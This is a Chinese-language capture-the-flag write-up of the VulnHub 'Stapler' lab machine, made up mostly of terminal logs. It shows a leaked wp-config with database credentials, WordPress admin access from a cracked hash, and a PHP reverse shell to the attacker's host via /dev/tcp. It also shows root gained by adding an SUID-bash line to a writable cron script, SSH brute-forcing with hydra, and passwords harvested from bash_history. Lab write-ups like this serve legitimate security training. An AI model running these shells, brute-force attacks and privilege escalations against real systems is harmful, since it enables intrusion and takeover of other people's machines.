# yunki @ yunki in ~/oscp/7.Stapler1 [11:26:12] C:5
$ wget https://192.168.54.27:12380/blogblog/wp-content/uploads/1320375804.jpeg   
--2023-05-29 11:26:19--  https://192.168.54.27:12380/blogblog/wp-content/uploads/1320375804.jpeg
正在连接 192.168.54.27:12380... 已连接。
错误: “192.168.54.27” 的证书不可信。
错误: “192.168.54.27” 的证书颁发者未知。
证书所有者与主机名 “192.168.54.27” 不符

# yunki @ yunki in ~/oscp/7.Stapler1 [11:26:19] C:5
$ wget -h | grep -i 'cert'                                                                                                                         
       --no-check-certificate       不要验证服务器的证书。
       --certificate=文件           客户端证书文件。
       --certificate-type=类型      客户端证书类型,PEM 或 DER。
       --ca-certificate=文件        带有一组 CA 证书的文件。
       --ca-certificate=文件        带有一组 CA 证书的文件。

# yunki @ yunki in ~/oscp/7.Stapler1 [11:26:34] 
$ wget https://192.168.54.27:12380/blogblog/wp-content/uploads/1320375804.jpeg --no-check-certificate
--2023-05-29 11:26:48--  https://192.168.54.27:12380/blogblog/wp-content/uploads/1320375804.jpeg
正在连接 192.168.54.27:12380... 已连接。
警告: “192.168.54.27” 的证书不可信。
警告: “192.168.54.27” 的证书颁发者未知。
证书所有者与主机名 “192.168.54.27” 不符
已发出 HTTP 请求,正在等待回应... 200 OK
长度:3042 (3.0K) [image/jpeg]
正在保存至: “1320375804.jpeg”

1320375804.jpeg                            100%[========================================================================================>]   2.97K  --.-KB/s  用时 0s      

2023-05-29 11:26:48 (117 MB/s) - 已保存 “1320375804.jpeg” [3042/3042])


# yunki @ yunki in ~/oscp/7.Stapler1 [11:26:48] 
$ cat 1320375804.jpeg 
<?php
/**
 * The base configurations of the WordPress.
 *
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, and ABSPATH. You can find more information by visiting
 * {@link https://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
 * Codex page. You can get the MySQL settings from your web host.
 *
 * This file is used by the wp-config.php creation script during the
 * installation. You don't have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'plbkac');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         'V 5p=[.Vds8~SX;>t)++Tt57U6{Xe`T|oW^eQ!mHr }]>9RX07W);
define('SECURE_AUTH_KEY',  'vJZq=p.Ug,]:<-P#A|k-+:;JzV8*pZ|K/U*J][Nyvs+}&!/#>4#K7eFP5-av`n)2');
define('LOGGED_IN_KEY',    'ql-Vfg[?v6{ZR*+O)|Hf OpPWYfKX0Jmpl8zU);
define('NONCE_KEY',        'j|V8J.~n}R2,mlU%?C8o2[~6Vo1{Gt+4mykbYH;HDAIj9TE?QQI!VW]]D`3i73xO');
define('AUTH_SALT',        'I{gDlDs`Z@.+/AdyzYw4%+}!||Xrf@1E6jJNV={p1?yMKYec*OI$');
define('SECURE_AUTH_SALT', '.HJmx^zb];5P}hM-uJ%^+9=0SBQEh[[*>#z+p>nVi10`XOUq (Zml~op3SG4OG_D');
define('LOGGED_IN_SALT',   '[Zz!)%R7/w37+:9L#.=hL:cyeMM2kTx&_nP4{D}n=y=FQt%zJw>c[a+;ppCzIkt;');
define('NONCE_SALT',       'tb(}BfgB7l!rhDVm{eK6^MSN-|o]S]]axl4TE_y+Fi5I-RxN/9xeTsK]#ga_9:hJ');

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each a unique
 * prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 */
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
        define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

define('WP_HTTP_BLOCK_EXTERNAL', true);

获取数据库root权限

发现了数据库 root的数据,尝试登录。root:plbkac
vulnhub 靶机渗透:Stapler_第9张图片

vulnhub 靶机渗透:Stapler_第10张图片这里可以看到john用户和其他用户有些不同,先去解密一下hash,然后尝试去登录后台,查看权限。
vulnhub 靶机渗透:Stapler_第11张图片成功使用john:incorrect登录管理员后台,后面就是wp的getshell操作了。

获取系统立足点

vulnhub 靶机渗透:Stapler_第12张图片直接上传插件脚本。

# yunki @ yunki in ~/oscp/7.Stapler1 [11:51:13] 
$ vim php_reverse_shell.php

# yunki @ yunki in ~/oscp/7.Stapler1 [11:54:07] 
$ cat php_reverse_shell.php 
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.54.128/443 0>&1'");?>

vulnhub 靶机渗透:Stapler_第13张图片开启监听,直接访问https://192.168.54.27:12380/blogblog/wp-content/uploads/php_reverse_shell.php

# yunki @ yunki in ~/oscp/7.Stapler1 [11:43:24] C:130
$ nc -lvnp 443                
listening on [any] 443 ...

connect to [192.168.54.128] from (UNKNOWN) [192.168.54.27] 34942
bash: cannot set terminal process group (1318): Inappropriate ioctl for device
bash: no job control in this shell
www-data@red:/var/www/https/blogblog/wp-content/uploads$ 
www-data@red:/var/www/https/blogblog/wp-content/uploads$ whoami 
whoami
www-data
www-data@red:/var/www/https/blogblog/wp-content/uploads$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:a7:37:64 brd ff:ff:ff:ff:ff:ff
    inet 192.168.54.27/24 brd 192.168.54.255 scope global ens33
       valid_lft forever preferred_lft forever
www-data@red:/var/www/https/blogblog/wp-content/uploads$ 

提权

习惯性上传linPEAS.sh。
kali端

# yunki @ yunki in ~/oscp/7.Stapler1 [11:54:09] 
$ cp /opt/PEAS/linPEAS.sh linPEAS.sh

# yunki @ yunki in ~/oscp/7.Stapler1 [12:02:39] 
$ php -S 0:80    
[Mon May 29 12:02:42 2023] PHP 7.4.15 Development Server (http://0:80) started

靶机

www-data@red:/tmp$ wget http://192.168.54.128/linPEAS.sh
wget http://192.168.54.128/linPEAS.sh
--2023-05-29 13:12:14--  http://192.168.54.128/linPEAS.sh
Connecting to 192.168.54.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 828172 (809K) [application/x-sh]
Saving to: 'linPEAS.sh.1'


2023-05-29 13:12:14 (50.5 MB/s) - 'linPEAS.sh.1' saved [828172/828172]

www-data@red:/tmp$ chmod +x linPEAS.sh

www-data@red:/tmp$ chmod +x linPEAS.sh
chmod +x linPEAS.sh
www-data@red:/tmp$ ./linPEAS.sh
./linPEAS.sh
                                                

最后发现了这个,可能是个定时任务,写入提权的shell。

╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path                                                                                  
You can write script: /usr/local/sbin/cron-logrotate.sh                                                                                                                   
www-data@red:/tmp$ cat /usr/local/sbin/cron-logrotate.sh
cat /usr/local/sbin/cron-logrotate.sh

cp /bin/bash /tmp/rtbash; chmod u+s /tmp/rtbash; chmod root:root /tmp/rtbash;

等待几分钟~~~~


www-data@red:/tmp$ ls -liah /tmp 
ls -liah /tmp
total 3.8M
 77204 drwxrwxrwt  9 root     root     4.0K May 29 13:17 .
     2 drwxr-xr-x 22 root     root     4.0K Jun  7  2016 ..
262146 drwxrwxrwt  2 root     root     4.0K May 29 10:18 .ICE-unix
262149 drwxrwxrwt  2 root     root     4.0K May 29 10:18 .Test-unix
262145 drwxrwxrwt  2 root     root     4.0K May 29 10:18 .X11-unix
262147 drwxrwxrwt  2 root     root     4.0K May 29 10:18 .XIM-unix
262148 drwxrwxrwt  2 root     root     4.0K May 29 10:18 .font-unix
 13547 -rwxr-xr-x  1 www-data www-data 809K May 29 12:53 linPEAS.sh
 13551 -rwsr-xr-x  1 root     root     1.1M May 29 13:10 rtbash
262175 drwx------  2 www-data www-data 4.0K May 29 12:54 tmux-33
262150 drwx------  2 root     root     4.0K May 29 10:18 vmware-root
www-data@red:/tmp$ /tmp/rtbash -p
/tmp/rtbash -p

whoami
root
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:a7:37:64 brd ff:ff:ff:ff:ff:ff
    inet 192.168.54.27/24 brd 192.168.54.255 scope global ens33
       valid_lft forever preferred_lft forever
cd /root 
ls
fix-wordpress.sh
flag.txt
issue
python.sh
wordpress.sql
cat flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
                          .-'''''-.
                          |'-----'|
                          |-.....-|
                          |       |
                          |       |
         _,._             |       |
    __.o`   o`"-.         |       |
 .-O o `"-.o   O )_,._    |       |
( o   O  o )--.-"`O   o"-.`'-----'`
 '--------'  (   o  O    o)  
              `----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b

其他思路

系统立足点1

enum4linux 扫描靶机发现好多用户

# yunki @ yunki in ~/oscp/7.Stapler1 [14:15:52] 
$ enum4linux 192.168.54.27                
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon May 29 14:16:07 2023

 =========================================( Target Information )=========================================
                                                                                                                                                                           
Target ........... 192.168.54.27                                                                                                                                           
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
             
 =================================( Share Enumeration on 192.168.54.27 )=================================
                                                                                                                                                                           
                                                                                                                                                                           
        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        kathy           Disk      Fred, What are we doing here?
        tmp             Disk      All temporary files should be stored here
        IPC$            IPC       IPC Service (red server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 192.168.54.27                                                                                                                              
                                                                                                                                                                           
//192.168.54.27/print$  Mapping: DENIED Listing: N/A Writing: N/A                                                                                                          
//192.168.54.27/kathy   Mapping: OK Listing: OK Writing: N/A
//192.168.54.27/tmp     Mapping: OK Listing: OK Writing: N/A

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''                                                                                                
                                                                                                                                                                         
S-1-22-1-1000 Unix User\peter (Local User)                                                                                                                                 
S-1-22-1-1001 Unix User\RNunemaker (Local User)
S-1-22-1-1002 Unix User\ETollefson (Local User)
S-1-22-1-1003 Unix User\DSwanger (Local User)
S-1-22-1-1004 Unix User\AParnell (Local User)
S-1-22-1-1005 Unix User\SHayslett (Local User)
S-1-22-1-1006 Unix User\MBassin (Local User)
S-1-22-1-1007 Unix User\JBare (Local User)
S-1-22-1-1008 Unix User\LSolum (Local User)
S-1-22-1-1009 Unix User\IChadwick (Local User)
S-1-22-1-1010 Unix User\MFrei (Local User)
S-1-22-1-1011 Unix User\SStroud (Local User)
S-1-22-1-1012 Unix User\CCeaser (Local User)
S-1-22-1-1013 Unix User\JKanode (Local User)
S-1-22-1-1014 Unix User\CJoo (Local User)
S-1-22-1-1015 Unix User\Eeth (Local User)
S-1-22-1-1016 Unix User\LSolum2 (Local User)
S-1-22-1-1017 Unix User\JLipps (Local User)
S-1-22-1-1018 Unix User\jamie (Local User)
S-1-22-1-1019 Unix User\Sam (Local User)
S-1-22-1-1020 Unix User\Drew (Local User)
S-1-22-1-1021 Unix User\jess (Local User)
S-1-22-1-1022 Unix User\SHAY (Local User)
S-1-22-1-1023 Unix User\Taylor (Local User)
S-1-22-1-1024 Unix User\mel (Local User)
S-1-22-1-1025 Unix User\kai (Local User)
S-1-22-1-1026 Unix User\zoe (Local User)
S-1-22-1-1027 Unix User\NATHAN (Local User)
S-1-22-1-1028 Unix User\www (Local User)
S-1-22-1-1029 Unix User\elly (Local User)

把用户处理一下,放到names,list中。

# yunki @ yunki in ~/oscp/7.Stapler1/other [14:23:45] 
$ cat a.sth| grep -i 'local'| awk -F '\' '{print$2}'| awk -F ' ' '{print$1}'|tr "A-Z" "a-z" >> ../names.list 

# yunki @ yunki in ~/oscp/7.Stapler1/other [14:23:57] 
$ cat a.sth                                                                                                 
S-1-22-1-1000 Unix User\peter (Local User)                                                                                                                                 
S-1-22-1-1001 Unix User\RNunemaker (Local User)
S-1-22-1-1002 Unix User\ETollefson (Local User)
S-1-22-1-1003 Unix User\DSwanger (Local User)
S-1-22-1-1004 Unix User\AParnell (Local User)
S-1-22-1-1005 Unix User\SHayslett (Local User)
S-1-22-1-1006 Unix User\MBassin (Local User)
S-1-22-1-1007 Unix User\JBare (Local User)
S-1-22-1-1008 Unix User\LSolum (Local User)
S-1-22-1-1009 Unix User\IChadwick (Local User)
S-1-22-1-1010 Unix User\MFrei (Local User)
S-1-22-1-1011 Unix User\SStroud (Local User)
S-1-22-1-1012 Unix User\CCeaser (Local User)
S-1-22-1-1013 Unix User\JKanode (Local User)
S-1-22-1-1014 Unix User\CJoo (Local User)
S-1-22-1-1015 Unix User\Eeth (Local User)
S-1-22-1-1016 Unix User\LSolum2 (Local User)
S-1-22-1-1017 Unix User\JLipps (Local User)
S-1-22-1-1018 Unix User\jamie (Local User)
S-1-22-1-1019 Unix User\Sam (Local User)
S-1-22-1-1020 Unix User\Drew (Local User)
S-1-22-1-1021 Unix User\jess (Local User)
S-1-22-1-1022 Unix User\SHAY (Local User)
S-1-22-1-1023 Unix User\Taylor (Local User)
S-1-22-1-1024 Unix User\mel (Local User)
S-1-22-1-1025 Unix User\kai (Local User)
S-1-22-1-1026 Unix User\zoe (Local User)
S-1-22-1-1027 Unix User\NATHAN (Local User)
S-1-22-1-1028 Unix User\www (Local User)
S-1-22-1-1029 Unix User\elly (Local User)

# yunki @ yunki in ~/oscp/7.Stapler1/other [14:24:01] 
$ cat ../n         
cat: ../n: 没有那个文件或目录

# yunki @ yunki in ~/oscp/7.Stapler1/other [14:24:10] C:1
$ cat ../names.list 
elly
john
scott
zoe
peter
rnunemaker
etollefson
dswanger
aparnell
shayslett
mbassin
jbare
lsolum
ichadwick
mfrei
sstroud
cceaser
jkanode
cjoo
eeth
lsolum2
jlipps
jamie
sam
drew
jess
shay
taylor
mel
kai
zoe
nathan
www
elly

继续加入之前wpsacn扫出来的信息。

garry
football
harry
monkey                                                                                                                                                 scott cookie  
kathy
coolgirl 

还有数据库数据统统加入进去!

root
plbkac
john
incorrect
...

使用hydra爆破ssh服务

# yunki @ yunki in ~/oscp/7.Stapler1/other [14:33:51] 
$ hydra -L ../names.list -P ../names.list ssh://192.168.54.27:22
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-05-29 14:33:53
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1936 login tries (l:44/p:44), ~121 tries per task
[DATA] attacking ssh://192.168.54.27:22/
[22][ssh] host: 192.168.54.27   login: zoe   password: plbkac
[STATUS] 328.00 tries/min, 328 tries in 00:01h, 1613 to do in 00:05h, 16 active

[STATUS] 328.33 tries/min, 985 tries in 00:03h, 956 to do in 00:03h, 16 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-05-29 14:40:04

发现zoe:plbkac,尝试ssh连接,成功。

系统立足点2

zoe@red:~$ cat /home/*/.bash_hisory
cat: '/home/*/.bash_hisory': No such file or directory
zoe@red:~$ cat /home/*/.bash_history
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost

获取到2个凭据JKanode:thisismypasswordpeter:JZQuyIN5

zoe@red:/home/JKanode$ cd /home
zoe@red:/home$ su - JKanode
Password: 
su: Authentication failure
zoe@red:/home$ su - JKanode
Password: 
JKanode@red:~$ whoami
JKanode
JKanode@red:~$ 

zoe@red:/home$ su - peter
Password: 

This is the Z Shell configuration function for new users,
zsh-newuser-install.
You are seeing this message because you have no zsh startup files
(the files .zshenv, .zprofile, .zshrc, .zlogin in the directory
~).  This function can help you with a few settings that should
make your use of the shell easier.

You can:

(q)  Quit and do nothing.  The function will be run again next time.

(0)  Exit, creating the file ~/.zshrc containing just a comment.
     That will prevent this function being run again.

(1)  Continue to the main menu.

(2)  Populate your ~/.zshrc with the configuration recommended
     by the system administrator and exit (you will need to edit
     the file by hand, if so desired).

--- Type one of the keys in parentheses --- 

Aborting.
The function will be run again next time.  To prevent this, execute:
  touch ~/.zshrc
red% whoami
peter

提权1

red% /bin/bash
peter@red:~$ whoami
peter
peter@red:~# sudo -l
Matching Defaults entries for root on red:
    lecture=always, env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User root may run the following commands on red:
    (ALL : ALL) ALL
peter@red:~$ sudo /bin/bash
root@red:~# whoami
root
root@red:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:a7:37:64 brd ff:ff:ff:ff:ff:ff
    inet 192.168.54.27/24 brd 192.168.54.255 scope global ens33
       valid_lft forever preferred_lft forever

root@red:~# ls /root
fix-wordpress.sh  flag.txt  issue  python.sh  wordpress.sql
root@red:~# cat /root/flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
                          .-'''''-.
                          |'-----'|
                          |-.....-|
                          |       |
                          |       |
         _,._             |       |
    __.o`   o`"-.         |       |
 .-O o `"-.o   O )_,._    |       |
( o   O  o )--.-"`O   o"-.`'-----'`
 '--------'  (   o  O    o)  
              `----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b

提权2

mysql + udf

zoe@red:/home$ mysql -uroot -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 1047
Server version: 5.7.12-0ubuntu1 (Ubuntu)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show variables like "%priv%"
    -> ;
+-------------------------+-------+
| Variable_name           | Value |
+-------------------------+-------+
| automatic_sp_privileges | ON    |
| secure_file_priv        |       |
+-------------------------+-------+
2 rows in set (0.04 sec)

mysql> show variables like "%plugin%";
+-------------------------------+------------------------+
| Variable_name                 | Value                  |
+-------------------------------+------------------------+
| default_authentication_plugin | mysql_native_password  |
| plugin_dir                    | /usr/lib/mysql/plugin/ |
+-------------------------------+------------------------+
2 rows in set (0.00 sec)

应该可以用,不尝试了。

你可能感兴趣的:(vulnhub,渗透测试,打靶,网络安全,web安全,安全,系统安全)